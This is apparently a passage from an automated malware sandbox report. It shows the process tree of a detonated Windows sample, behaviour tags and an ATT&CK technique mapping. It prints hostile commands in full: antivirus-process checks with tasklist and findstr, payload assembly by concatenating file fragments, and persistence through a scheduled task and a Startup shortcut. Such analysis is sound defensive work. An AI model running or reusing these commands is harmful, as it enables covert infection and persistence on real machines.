        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffb00946f8,0x7fffb0094708,0x7fffb0094718
        8⤵
        
        PID:6468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
        8⤵
        
        PID:3520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
        8⤵
        
        PID:6104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:8
        8⤵
        
        PID:4356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:2
        8⤵
        
        PID:2828
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2624 /prefetch:2
        8⤵
        
        PID:5904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2624 /prefetch:2
        8⤵
        
        PID:6384
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2396 /prefetch:2
        8⤵
        
        PID:228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4064 /prefetch:2
        8⤵
        
        PID:4160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4140 /prefetch:2
        8⤵
        
        PID:5576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4340 /prefetch:2
        8⤵
        
        PID:6824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3736 /prefetch:2
        8⤵
        
        PID:6640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 948
        6⤵
        Program crash
        
        PID:6516
    - - C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6604
      - C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
        
        C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:7036
        
        C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5376
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        9⤵
        
        PID:6076
    - - C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5984
    - - C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe"
        5⤵
        
        PID:6052
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        6⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        7⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:7084
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:2204
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        7⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 353090
        7⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Really.pub
        7⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "posted" Good
        7⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        7⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        7⤵
        
        PID:6392
        
        C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
        
        Seat.com m
        7⤵
        
        PID:6564
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:6536
    - - C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
        5⤵
        
        PID:6604
      - C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
        6⤵
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
        6⤵
        
        PID:6084
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 928
        6⤵
        Program crash
        
        PID:6080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10126780141\ogfNbjS.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5292
    - - C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe"
        5⤵
        
        PID:7116
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
      "C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2460
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 856 -ip 856
1⤵
PID:2812

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2508

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3440 -ip 3440
1⤵
PID:3132

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2072

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6604 -ip 6604
1⤵
PID:6100

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
1⤵
PID:4928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1296

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
1⤵
PID:5928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion